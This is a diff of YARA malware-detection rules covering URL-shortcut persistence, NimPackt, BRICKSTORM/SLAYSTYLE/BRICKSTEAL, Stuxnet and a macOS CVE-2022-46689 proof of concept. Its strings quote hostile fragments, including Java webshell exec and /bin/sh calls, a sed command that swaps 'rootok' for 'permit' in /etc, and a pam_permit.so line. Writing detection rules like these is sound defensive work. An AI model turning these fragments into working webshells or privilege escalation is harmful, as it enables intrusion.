-		$s2 = "ENIGMA" fullword ascii
+		$icon = "WorkingDirectory=http" nocase
+		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$url_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them )
+		$icon and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-rule SIGNATURE_BASE_Enigma_Protected_Malware_May17_Rhxfiles : FILE
+rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Workingdirremote_SMB : FILE
 {
 	meta:
-		description = "Auto-generated rule - file RhxFiles.dll"
-		author = "Florian Roth (Nextron Systems) with the help of binar.ly"
-		id = "d701d591-4283-5645-8768-a5ab7df0f37a"
-		date = "2017-05-02"
+		description = "Detects possible shortcut usage for .URL persistence"
+		author = "@itsreallynick (Nick Carr)"
+		id = "26e19fe3-c25c-53b0-9b41-c04803134bc2"
+		date = "2019-09-27"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_enigma_protector.yar#L25-L39"
+		reference = "https://twitter.com/cglyer/status/1176184798248919044"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L280-L297"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "838ab7dddda798d2f5c79fc5417693f8489195b3024c43d9ad1aab05fcfd71eb"
-		score = 75
+		logic_hash = "5d9caa64ac730d34a2dcfb3368f8302849275b6ee16fe31f20978d72382b0d73"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		hash1 = "2187d6bd1794bf7b6199962d8a8677f19e4382a124c30933d01aba93cc1f0f15"
 
 	strings:
-		$op1 = { bd 9c 74 f6 7a 3a f7 94 c5 7d 7c 7c 7c 7e ae 73 }
-		$op2 = { 82 62 6b 6b 6b 68 a5 ea aa 69 6b 6b 6b 3a 3b 94 }
-		$op3 = { 7c 7c c5 7d 7c 7c 7c 7e ae 73 f9 79 7c 7c 7c f6 }
+		$icon = "WorkingDirectory=file://" nocase
+		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$url_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them )
+		$icon and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-rule SIGNATURE_BASE_Enigma_Protected_Malware : FILE
+rule SIGNATURE_BASE_HKTL_Nim_Nimpackt : EXE FILE HKTL
 {
 	meta:
-		description = "Detects samples packed by Enigma Protector"
-		author = "Florian Roth (Nextron Systems) with the help of binar.ly"
-		id = "d701d591-4283-5645-8768-a5ab7df0f37a"
-		date = "2017-02-03"
+		description = "Detects binaries generated with NimPackt v1"
+		author = "Cas van Cooten"
+		id = "3399d937-133f-5701-840e-eaf68b2f1ec9"
+		date = "2022-01-26"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/OEVQ9w"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_enigma_protector.yar#L41-L55"
+		reference = "https://github.com/chvancooten/NimPackt-v1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_nimpackt.yar#L2-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1a254d4d593b73d16d1cfbd73d7d4b2732a080cb98d70972de0826433b004152"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		hash1 = "d4616f9706403a0d5a2f9a8726230a4693e4c95c58df5c753ccc684f1d3542e2"
+		logic_hash = "2bda7acb440d1c72efeaddcb18b736343d658d59feccf6c9339b313cd35f32eb"
+		score = 80
+		quality = 79
+		tags = "EXE, FILE, HKTL"
 
 	strings:
-		$s1 = { 5d 5d 5d aa bf 5e 95 d6 dc 51 5d 5d 5d 5e 98 0d }
-		$s2 = { 52 d9 47 5d 5d 5d dd a6 b4 52 d9 4c 5d 5d 5d 3b }
-		$s3 = { 9f 59 14 52 d8 a9 a2 a2 a2 00 9f 51 5d d6 d1 79 }
+		$nim1 = "fatal.nim" ascii fullword
+		$nim2 = "winim" ascii
+		$np1 = { 4E 69 6D 50 61 63 6B 74 }
+		$sus1 = { 61 6D 73 69 00 00 00 00 B8 57 00 07 80 C3 }
+		$sus2 = { 5B 2B 5D 20 49 6E 6A 65 63 74 65 64 }
+		$sus3 = { 5C 2D 2D 20 62 79 74 65 73 20 77 72 69 74 74 65 6E 3A }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		uint16( 0 ) == 0x5A4D and filesize < 750KB and 1 of ( $nim* ) and ( $np1 or 2 of ( $sus* ) )
 }
-rule SIGNATURE_BASE_Fidelis_Advisory_Purchase_Order_Pps
+rule SIGNATURE_BASE_MAL_G_APT_Backdoor_BRICKSTORM_3 : FILE
 {
 	meta:
-		description = "Detects a string found in a malicious document named Purchase_Order.pps"
-		author = "Florian Roth (Nextron Systems)"
-		id = "205c4cda-6874-5455-8eb9-b63fb09b13fd"
-		date = "2015-06-09"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/ZjJyti"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fidelis_phishing_plain_sight.yar#L2-L14"
+		description = "Detects BRICKSTORM backdoor used by APT group UNC5221 (China Nexus)"
+		author = "Google Threat Intelligence Group (GTIG) (modified by Florian Roth)"
+		id = "22172f5a-0560-56f8-9c0c-12eb6807e3bb"
+		date = "2025-09-25"
+		modified = "2025-10-07"
+		reference = "https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_brickstorm_sep25.yar#L1-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "45cfee6413accff36a39ced861a29c611d6efe24e1ca87f17467106f8565642b"
+		hash = "931eacd7e5250d29903924c31f41b7e5"
+		logic_hash = "168bc2bdfff6a135f4ec89f8cf79051e6dcd242b314e3238553d67929995a9ea"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "Users\\Gozie\\Desktop\\Purchase-Order.gif" ascii
+		$str1 = { 48 8B 05 ?? ?? ?? ?? 48 89 04 24 E8 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 04 24 [0-5] E8 ?? ?? ?? ?? EB ?? }
+		$str4 = "decompress" ascii
+		$str5 = "MIMEHeader" ascii
+		$str6 = "ResolveReference" ascii
+		$str7 = "115792089210356248762697446949407573529996955224135760342422259061068512044369115792089210356248762697446949407573530086143415290314195533631308867097853951" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x457F and all of them
 }
-rule SIGNATURE_BASE_Fidelis_Advisory_Cedt370
+rule SIGNATURE_BASE_MAL_G_Backdoor_BRICKSTORM_2 : FILE
 {
 	meta:
-		description = "Detects a string found in memory of malware cedt370r(3).exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b5ebf2d7-e3e4-5b3b-a082-417da9c7fda6"
-		date = "2015-06-09"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/ZjJyti"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fidelis_phishing_plain_sight.yar#L16-L30"
+		description = "Detects BRICKSTORM backdoor used by APT group UNC5221 (China Nexus)"
+		author = "Google Threat Intelligence Group (GTIG) (modified by Florian Roth)"
+		id = "3300ff33-a32f-59e4-b4bd-d434345da611"
+		date = "2025-09-25"
+		modified = "2025-10-07"
+		reference = "https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_brickstorm_sep25.yar#L19-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1070d3c63a7091c0982e67134f9dc3cd790bb0b5c2ac08f3a00e3b97ef53d64b"
+		logic_hash = "afea32d3c817473ec0dbc20177daa4070f847c23295318fa093fc3a96a15e764"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s0 = "PO.exe" ascii fullword
-		$s1 = "Important.exe" ascii fullword
-		$s2 = "&username=" ascii fullword
-		$s3 = "Browsers.txt" ascii fullword
+		$decr1 = { 0F B6 4C 04 ?? 0F B6 54 04 ?? 31 D1 88 4C 04 ?? 48 FF C0 [0-4] 48 83 F8 ?? 7C }
+		$decr2 = { 40 88 7C 34 34 48 FF C3 48 FF C6 48 39 D6 7D 18 0F B6 3B 48 39 CE 73 63 44 0F B6 04 30 44 31 C7 48 83 FE 04 72 DA }
+		$decr3 = { 0F B6 54 0C ?? 0F B6 5C 0C ?? 31 DA 88 14 08 48 FF C1 48 83 F9 ?? 7C E8 }
+		$str1 = "main.selfWatcher"
+		$str2 = "main.copyFile"
+		$str3 = "main.startNew"
+		$str4 = "WRITE_LOG=true"
+		$str5 = "WRITE_LOGWednesday"
+		$str6 = "vami-httpdvideo/webm"
+		$str7 = "/opt/vmware/sbin/"
+		$str8 = "/home/vsphere-ui/"
+		$str9 = "/opt/vmware/sbin/vami-http"
+		$str10 = "main.getVFromEnv"
 
 	condition:
-		all of them
+		uint32( 0 ) == 0x464c457f and filesize < 10MB and ( 1 of ( $decr* ) and 1 of ( $str* ) or 5 of ( $str* ) )
 }
-rule SIGNATURE_BASE_EXPL_HKTL_Macos_Switcharoo_CVE_2022_46689_Dec22 : CVE_2022_46689 FILE
+rule SIGNATURE_BASE_MAL_G_APT_Backdoor_BRICKSTORM_1 : FILE
 {
 	meta:
-		description = "Detects POCs that exploit privilege escalation vulnerability CVE-2022-46689 on macOS"
-		author = "Florian Roth (Nextron Systems)"
-		id = "25c551f7-48ae-5e71-b86e-68fb440262e5"
-		date = "2022-12-19"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_macos_switcharoo_dec22.yar#L2-L40"
+		description = "Detects BRICKSTORM backdoor used by APT group UNC5221 (China Nexus)"
+		author = "Google Threat Intelligence Group (GTIG) (modified by Florian Roth)"
+		id = "ecf69598-f0da-5234-940e-059de648ad74"
+		date = "2025-09-25"
+		modified = "2025-10-07"
+		reference = "https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_brickstorm_sep25.yar#L53-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c2cbe12a01a38db522c49143c5168d3519ef974b4e6157cb251aa66707c69d78"
-		score = 80
+		hash = "4645f2f6800bc654d5fa812237896b00"
+		logic_hash = "ffaeca48c96445044844779f28c46a5c6029ba96191d3faafbc8f3864c29e21b"
+		score = 75
 		quality = 85
-		tags = "CVE-2022-46689, FILE"
-		hash1 = "64acd79a37b6f8443250dd33e95bd933ee39fc6d4f35ba6a987dae878d017386"
-		hash2 = "6c2ace75000de8a7e8786f28b1b41eed72816991a0961475c6800753bfe9278c"
-		hash3 = "6ce080b236ea3aa3b4c992d12af99445ab800abc709c6abbef852a9f0cf219b6"
-		hash4 = "83cc4d72686aedf5218f07e60e759b4849b368975b70352dbba6fac4e8cde72b"
-		hash5 = "a7b7fcfd609ff653d32c133417c0d3ffd9f581fb6de05ddbdead4d36cb6e3cc2"
-		hash6 = "b2a97edb0ddc30ecc1a0b0c0739820bbef787394b44ab997393475de2ebf7b60"
-		hash7 = "c7a64c6da5cf5046ae5c683d0264a32027110a2736b4c1b0df294e29a061a865"
-		hash8 = "d517cde0d45e6930336538c89b310d5d540a66c921bf6f6f9b952e721b2f6a11"
-		hash9 = "d53a559ea9131fe42eacf51431da3adde5a8fd5c2f3198f0d5451ef62ed33888"
+		tags = "FILE"
 
 	strings:
-		$x1 = "vm_read_overwrite: KERN_SUCCESS:%d KERN_PROTECTION_FAILURE:%d other:%d" ascii fullword
-		$x2 = "Execting: %s (posix_spawn returned: %d)" ascii fullword
-		$x3 = "/usr/bin/sed -e \"s/rootok/permit/g\" /etc" ascii fullword
-		$x4 = "vm_unaligned_copy_switch_race" ascii fullword
-		$s1 = "RO mapping was modified" ascii fullword
-		$s2 = "Ran %d times in %ld seconds with no failure" ascii fullword
-		$opa1 = { 4c 89 ee 31 c9 41 b8 00 40 00 00 6a 01 41 5c 41 54 6a 03 58 }
-		$opa2 = { e8 ?? 01 00 00 48 8b 05 ?? 0? 00 00 8b 38 48 8b 13 44 8b 4b 14 48 83 ec 08 4c 89 ee 31 c9 }
-		$opa3 = { 48 89 45 c8 48 8d 43 08 48 89 45 d0 4c 8b 7d c8 4c 8b 6d d0 6a 64 41 5e 80 7b 60 00 }
-		$opb1 = { 55 48 89 e5 48 83 ec 60 48 8b 05 ?1 06 00 00 48 8b 00 48 89 45 f8 0f 28 05 ?b 07 00 00 48 8d 75 d0 }
+		$ = "WRITE_LOGWednesday"
+		$ = "/home/vsphere-ui/"
+		$ = "WRITE_LOG=true"
+		$ = "dns rcode: %v"
+		$ = "/libs/doh.createDnsMessage"
+		$ = "/libs/func1.(*Client).BackgroundRun"
+		$ = "/libs/func1.CreateClient"
+		$ = "/core/extends/command.CommandNoContext"
+		$ = "/core/extends/command.ExecuteCmd"
+		$ = "/core/extends/command.RunShell"
+		$ = "/libs/fs.(*RemoteDriver).DeleteFile"
+		$ = "/libs/fs.(*RemoteDriver).GetFile"
+		$ = "/libs/fs.(*RemoteDriver).PutFile"
+		$ = "/libs/doh/doh.go"
 
 	condition:
-		( filesize < 400KB and 1 of ( $x* ) ) or ( ( uint16( 0 ) == 0xfacf or ( uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca ) ) and filesize < 400KB and 2 of them )
+		uint32( 0 ) == 0x464c457f and 5 of them
 }
-rule SIGNATURE_BASE_EXPL_Macos_Switcharoo_Indicator_Dec22 : CVE_2022_46689 FILE
+rule SIGNATURE_BASE_MAL_G_APT_Backdoor_BRICKSTORM_2 : FILE
 {
 	meta:
-		description = "Detects indicators found after exploitations of CVE-2022-46689"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d5d9559a-c19c-5ddc-9d72-701986a9d7ac"
-		date = "2022-12-19"
-		modified = "2023-12-05"
-		reference = "https://github.com/zhuowei/MacDirtyCowDemo"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_macos_switcharoo_dec22.yar#L42-L54"
+		description = "Detects BRICKSTORM backdoor used by APT group UNC5221 (China Nexus)"
+		author = "Google Threat Intelligence Group (GTIG) (modified by Florian Roth)"
+		id = "d11ae2e1-4197-5545-a431-eec8514e58e8"
+		date = "2025-09-25"
+		modified = "2025-10-07"
+		reference = "https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_brickstorm_sep25.yar#L80-L92"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9b9ea134fc4b3a7b15ae585ced2e12cbe1defc54bc6175282d6b7a2a0b65abd1"
-		score = 65
+		logic_hash = "db989caa2a80481e58e6d65068e1814cf7366e3bdfc347e9019fb2bc980c74fa"
+		score = 75
 		quality = 85
-		tags = "CVE-2022-46689, FILE"
+		tags = "FILE"
 
 	strings:
-		$x1 = "auth       sufficient     pam_permit.so" ascii
+		$str1 = { 0F 57 C0 0F 11 84 ?? ?? ?? ?? ?? C6 44 ?? ?? 00 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 0F 57 C0 0F 11 84 ?? ?? ?? ?? ?? 0F 11 84 ?? ?? ?? ?? ?? 4? 8B 84 ?? ?? ?? ?? ?? 4? 89 04 ?? 4? 8B 8C ?? ?? ?? ?? ?? 4? 89 4C ?? ?? E8 ?? ?? ?? ?? 4? 83 7C ?? ?? 00 0F 84 ?? ?? ?? ?? 4? 8D 05 ?? ?? ?? ?? 4? 89 ?? ?? E8 ?? ?? ?? ?? 4? 8B 7C ?? ?? 4? 8B 84 ?? ?? ?? ?? ?? 4? 89 47 08 83 3D ?? ?? ?? ?? 00 75 ?? 4? 8B 84 ?? ?? ?? ?? ?? 4? 89 07 4? 89 BC ?? ?? ?? ?? ?? 4? C7 84 ?? ?? ?? ?? ?? 01 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 01 00 00 00 0F 57 C0 0F 11 84 ?? ?? ?? ?? ?? 4? 8B ?? ?? ?? ?? ?? ?? 4? 81 C4 ?? ?? ?? ?? C3 }
+		$str2 = { 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 4? 8B 84 ?? ?? ?? ?? ?? 4? 89 04 ?? 4? 8B 8C ?? ?? ?? ?? ?? 4? 89 4C ?? ?? E8 ?? ?? ?? ?? 4? 8B 44 ?? ?? 4? 85 C0 0F 84 ?? ?? ?? ?? 4? 8D 05 ?? ?? ?? ?? 4? 89 ?? ?? E8 ?? ?? ?? ?? 4? 8B 44 ?? ?? 4? 8B 8C ?? ?? ?? ?? ?? 4? 89 48 08 8B 0D ?? ?? ?? ?? 85 C9 75 ?? 4? 8B 8C ?? ?? ?? ?? ?? 4? 89 08 84 00 4? 89 84 ?? ?? ?? ?? ?? 4? C7 84 ?? ?? ?? ?? ?? 01 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 01 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 90 E8 ?? ?? ?? ?? 4? 8B ?? ?4 D8 00 00 00 4? 81 C4 E0 00 00 00 C3 }
 
 	condition:
-		filesize < 1KB and $x1
+		uint32be( 0 ) == 0x7F454C46 and any of them
 }
-rule SIGNATURE_BASE_Stuxnet_Malware_1
+rule SIGNATURE_BASE_WEBSHELL_G_APT_Backdoorwebshell_SLAYSTYLE_1 : FILE
 {
 	meta:
-		description = "Stuxnet Sample - file malware.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1f475dc3-ebb3-508f-b696-3d9ea270b13d"
-		date = "2016-07-09"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stuxnet.yar#L10-L41"
+		description = "Detects webshell used by APT group UNC5221 (China Nexus)"
+		author = "Google Threat Intelligence Group (GTIG) (modified by Florian Roth)"
+		id = "a5107e4e-3618-5d08-b187-342d5cb1b12f"
+		date = "2025-09-25"
+		modified = "2025-10-07"
+		reference = "https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_brickstorm_sep25.yar#L94-L112"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8caa6bddef3c05e572ef342513190832900dcb1a7a56589ed7df48b3c6992ed1"
+		logic_hash = "7a56238218e60a69049f5d9c756df4fb6f0de772fbc437a14c5db7192f971be6"
 		score = 75
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9c891edb5da763398969b6aaa86a5d46971bd28a455b20c2067cb512c9f9a0f8"
+		quality = 83
+		tags = "FILE"
 
 	strings:
-		$op1 = { 8b 45 08 35 dd 79 19 ae 33 c9 8b 55 08 89 02 89 }
-		$op2 = { 74 36 8b 7f 08 83 ff 00 74 2e 0f b7 1f 8b 7f 04 }
-		$op3 = { 74 70 81 78 05 8d 54 24 04 75 1b 81 78 08 04 cd }
+		$str1_alt = "=request.getParameter(\""
+		$str2 = "=new String(java.util.Base64.getDecoder().decode(" ascii wide nocase
+		$str21_alt = "={\"/bin/sh\",\"-c\"," ascii
+		$str3 = "= Runtime.getRuntime().exec(" ascii
+		$str4 = "java.io.InputStream" ascii
+		$str5 = "java.util.Base64.getEncoder().encodeToString(org.apache.commons.io.IOUtils.toByteArray(" ascii
 
 	condition:
-		all of them
+		filesize < 5MB and all of them
 }
-rule SIGNATURE_BASE_Stuxnet_Malware_2 : FILE
+rule SIGNATURE_BASE_WEBSHELL_G_APT_Backdoorwebshell_SLAYSTYLE_2 : FILE
 {
 	meta:
-		description = "Stuxnet Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2865353c-44c5-5280-878b-daadcef017b8"
-		date = "2016-07-09"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stuxnet.yar#L43-L57"
+		description = "Detects webshell used by APT group UNC5221 (China Nexus)"
+		author = "Google Threat Intelligence Group (GTIG) (modified by Florian Roth)"
+		id = "a7c3e453-c071-5863-887a-6eca6d74d2fe"
+		date = "2025-09-25"
+		modified = "2025-10-07"
+		reference = "https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_brickstorm_sep25.yar#L114-L129"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ecf992f8fd38b1ab3e05bfe05f260bcaf617f168484477aa81acb9b517b9f3e7"
+		logic_hash = "d2d1003f77a2066b48df1c27feab79c0a1951ebb62c3198de8366bcfee42e30a"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "63e6b8136058d7a06dfff4034b4ab17a261cdf398e63868a601f77ddd1b32802"
 
 	strings:
-		$s1 = "\\SystemRoot\\System32\\hal.dll" wide
-		$s2 = "http://www.jmicron.co.tw0" fullword ascii
+		$str1 = "request.getParameter"
+		$str2 = "/bin/sh"
+		$str3 = "java.io.InputStream"
+		$str4 = "Runtime.getRuntime().exec("
+		$str5 = "2>&1"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 70KB and all of them
+		( uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464C457F ) and filesize < 7KB and all of them and @str4 > @str2
 }
-rule SIGNATURE_BASE_Stuxnet_Dll : FILE
+rule SIGNATURE_BASE_MAL_G_Backdoor_BRICKSTEAL_1 : FILE
 {
 	meta:
-		description = "Stuxnet Sample - file dll.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "92d812a6-2622-56e4-96c5-eb65ab7055b9"
-		date = "2016-07-09"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stuxnet.yar#L59-L72"
+		description = "Detects backdoor BRICKSTEAL used by APT group UNC5221 (China Nexus)"
+		author = "Google Threat Intelligence Group (GTIG) (modified by Florian Roth)"
+		id = "03635d14-35b4-59a4-98ca-e552888d67ed"
+		date = "2025-09-25"
+		modified = "2025-10-07"
+		reference = "https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_brickstorm_sep25.yar#L131-L146"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0c192153c268fdd330d3b9e2eb0d8383bd50ce6d036409f0cc0c9273ba8201b3"
+		logic_hash = "27413b63eae84d95cf0ca920e9ac1daba200281ecc32cc9922c0e7850c7f0571"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9e392277f62206098cf794ddebafd2817483cfd57ec03c2e05e7c3c81e72f562"
 
 	strings:
-		$s1 = "SUCKM3 FROM EXPLORER.EXE MOTH4FUCKA #@!" fullword ascii
+		$str1 = "comvmware"
+		$str2 = "abcdABCD1234!@#$"
+		$str3 = "ads.png"
+		$str4 = "User-Agent"
+		$str5 = "com/vmware/"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and $s1
+		all of them and filesize < 10KB
 }
-rule SIGNATURE_BASE_Stuxnet_Shortcut_To : FILE
+rule SIGNATURE_BASE_MAL_G_Dropper_BRICKSTEAL_1
 {
 	meta:
-		description = "Stuxnet Sample - file Copy of Shortcut to.lnk"
-		author = "Florian Roth (Nextron Systems)"
-		id = "582ab12b-808e-5d5c-ba36-3bb987c4c552"
-		date = "2016-07-09"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stuxnet.yar#L74-L87"
+		description = "Detects backdoor BRICKSTEAL dropper used by APT group UNC5221 (China Nexus)"
+		author = "Google Threat Intelligence Group (GTIG) (modified by Florian Roth)"
+		id = "73775e1a-6eaf-5ac5-bede-a9863449b6c5"
+		date = "2025-09-25"
+		modified = "2025-10-07"
+		reference = "https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_brickstorm_sep25.yar#L148-L165"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a8119500d38bcfc60620265386f31899e586f62e1ceeeff365fd0018ab39c30e"
+		logic_hash = "5ed68f17ba8ac0c7ba02f9111f083244181332c71ed43b4cd5582baee493c98d"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "801e3b6d84862163a735502f93b9663be53ccbdd7f12b0707336fecba3a829a2"
+		tags = ""
 
 	strings:
-		$x1 = "\\\\.\\STORAGE#Volume#_??_USBSTOR#Disk&Ven_Kingston&Prod_DataTraveler_2.0&Rev_PMAP#5B6B098B97BE&0#{53f56307-b6bf-11d0-94f2-00a0c" wide
+		$str1 = "Base64.getDecoder().decode"
+		$str2 = "Thread.currentThread().getContextClassLoader()"
+		$str3 = ".class.getDeclaredMethod"
+		$str4 = "byte[].class"
+		$str5 = "method.invoke"
+		$str6 = "filterClass.newInstance()"
+		$str7 = "/websso/SAML2/SSO/*"
 
 	condition:
-		uint16( 0 ) == 0x004c and filesize < 10KB and $x1
+		all of them
 }
-rule SIGNATURE_BASE_Stuxnet_Malware_3 : FILE
+rule SIGNATURE_BASE_MAL_G_Dropper_BRICKSTEAL_2
 {
 	meta:
-		description = "Stuxnet Sample - file ~WTR4141.tmp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1b0b301a-bf29-5080-a7d6-4d5f389bdf50"
-		date = "2016-07-09"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stuxnet.yar#L89-L110"
+		description = "Detects backdoor BRICKSTEAL dropper used by APT group UNC5221 (China Nexus)"
+		author = "Google Threat Intelligence Group (GTIG) (modified by Florian Roth)"
+		id = "3428d706-9844-5505-9690-1f4c3e805350"
+		date = "2025-09-25"
+		modified = "2025-10-07"
+		reference = "https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_brickstorm_sep25.yar#L167-L184"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d8c546fb74b419d46bab855fa07a55833ab0a23eb4081ce24a5d4ab0e4bf09dc"
+		logic_hash = "e1bdcc59259b2bf476b873a9f94b9296efc7720d83fba04f6569217019ae3af8"
 		score = 75
 		quality = 85
-		tags = "FILE"
